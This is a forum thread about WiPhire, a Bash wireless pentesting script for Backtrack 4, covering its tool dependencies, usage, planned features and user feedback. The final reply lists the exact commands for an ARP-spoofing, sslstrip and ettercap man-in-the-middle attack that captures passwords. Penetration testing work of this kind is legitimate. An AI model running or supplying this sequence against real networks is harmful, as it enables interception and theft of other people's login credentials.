
WiPhire - Wireless Pentesting Tool

WiPhire is a Bash script aimed at making all of the standard wireless attacks a lot easier to perform.

Requirements:
This script was written on Backtrack 4 and designed to be used with Backtrack 4. You can try to run it on other OS's but I will not be modifying this for any other OS; you will have to do that yourself. This was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite, you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. You can do this with 'airmon-ng start <interface>'. Also do note that this script needs to be run as root.

Programs that WiPhire Uses:
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
- xterm
- crunch (Requires directory /pentest/passwords/crunch)
- pyrit
- sslstrip
- arpspoof
- macchanger
- kate
- apache2 (Requires directory /etc/init.d/apache2)
- ettercap
- firefox (Trivial)

Usage:
To use this Bash script (or any Bash script) you need to take the script and place it somewhere that you can remember. For this example I will just use /root/. Now if you are root and you have the script on your desktop, open up a terminal and type ./WiPhire. This will now run the script. If you get a permissions error you will need to change the permissions to make the script executable: 'chmod 777 ./WiPhire'. This will now allow you to run it. If the script is stored in a different location you need to change the directory to the location before running the script. For example, if the script was in a folder called 'scripts' on root's desktop we would run 'cd /root/scripts/'. Then we would run './WiPhire'.

Re: WiPhire - Wireless Pentesting Tool

Not sure we need *another* one of these; however, if you want the submission of your tool to be taken seriously, you have to point out why your tool is better than some of the current ones and what it does that the other tools do not.

Re: WiPhire - Wireless Pentesting Tool

For future versions of this, I intend to make it even more user friendly and allow a greater variety of options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in-depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also I would like to incorporate any new methods and techniques discovered in the coming months/years.

The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit). If you look at SET and WiPhire you can see that they are both trying to be an all-encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

To be honest I haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

I would like some feedback as to what needs to be improved/included in future versions, so a response from anyone who has downloaded it would be great!

Re: WiPhire - Wireless Pentesting Tool

I liked your solution for finding the wireless cards. Needs a bit more development but it's the right idea. Also LOL at redirecting to fbi.gov. I know it's harmless but you might want to take that out.

Originally Posted by Middle

For future versions of this, I intend to make it even more user friendly and allow a greater variety of options to be available for the individual operations. So for example include cpyrit set up with a GPU, alternate methods of generating packets for WEP cracking, more in-depth options for DNS spoofing, more options for MITM attacks and maybe including a utility for mdk3. Also I would like to incorporate any new methods and techniques discovered in the coming months/years.

The idea for WiPhire is that it becomes the wireless equivalent of SET (Social Engineers Toolkit). If you look at SET and WiPhire you can see that they are both trying to be an all-encompassing tool for the subject. The idea is that WiPhire will have an option for every major wireless operation.

To be honest I haven't really seen many scripts of this caliber in the wireless field. I have seen quite a few WEP cracking scripts and a couple of MITM scripts, but there isn't anything to my knowledge that has everything in one package.

I would like some feedback as to what needs to be improved/included in future versions, so a response from anyone who has downloaded it would be great!

Thanks

"Never do anything against conscience -- even if the state demands it."
-- Albert Einstein

Re: WiPhire - Wireless Pentesting Tool

Thanks a lot for the feedback, I was starting to think that I would never hear any!

I think that if I can generate some interest and have it seriously considered for inclusion with Backtrack then I will go through it and make it as polished as I can! It is so annoying that no matter how many times you check something, prior to its release you will notice another problem...

I have had 136 downloads from my SourceForge page alone, and I have not advertised that page anywhere else, so thanks a lot guys! In total I have had over 300 downloads in just under two weeks =]

Re: WiPhire - Wireless Pentesting Tool

I do actually plan to test it myself because from the menu/post, if it behaves as advertised, it seems like it would be cool. I just have not had the time recently but it is on my to-do list and I will leave some feedback here.

Re: WiPhire - Wireless Pentesting Tool

Hey man, I tried WiPhire, it's a dream coming true for me. 10x for your script, I really adore it, but I have a suggestion: if you can, make the MITM in a different way like gotmilk did. Look what I mean:
kate /etc/etter.conf
>*uncomment redir_command_off in the iptables, linux section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -a -k -f
ettercap -T -q -i wlan0
In this method the password appears in ettercap without searching.